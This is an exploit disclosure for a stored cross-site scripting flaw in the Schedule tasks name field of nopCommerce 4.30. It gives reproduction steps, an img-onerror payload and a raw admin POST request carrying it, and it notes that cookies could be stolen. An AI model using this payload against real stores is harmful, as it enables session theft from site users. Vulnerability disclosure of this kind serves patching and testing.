# Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting # Date: 24-11-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://www.nopcommerce.com/ # Version: 4.30 # Tested on: Windows 10/Kali Linux Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Attack vector: This vulnerability can results attacker to inject the XSS payload in Schedule tasks and each time any user will go to that page of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Schedule tasks. Steps-To-Reproduce: 1. Go to the nopCommerce Store admin page. 2. Now go to the System-Schedule tasks option. 3. Now click to on edit button on any task. 4. Put the below payload in Schedule tasks: "hemantsolo"><img src=x onerror=confirm(1)>" 5. Now click on Update button. 6. The XSS will be triggered. POST /Admin/ScheduleTask/TaskUpdate HTTP/1.1 Host: 127.0.0.1 Connection: close Content-Length: 335 Accept: application/json, text/javascript, */*; q=0.01 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: 127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: 127.0.0.1/Admin/ScheduleTask/List Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 Cookie: xyz Id=5&Name=hemantsolo%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm(1)%3E&Seconds=3600&Enabled=false&StopOnError=false&__RequestVerificationToken=CfDJ8Hstb5ORl7RLtnBnyhE10fENmFHuOPhDq-cN_XNT5gs_nUq2ht5UeggYY9Fea9OqSCeJnVy_e4IKpQ7HhLYwtOMRS76BYcfJ9Os-CI9BxTxrumbAaunwIxrDMZm6CbNRs9EPzKQabez4H7dNpXG6oVpiC5Pc__xQVm06bp4c4O_D15lqehkk6EmqDAizfm8LFA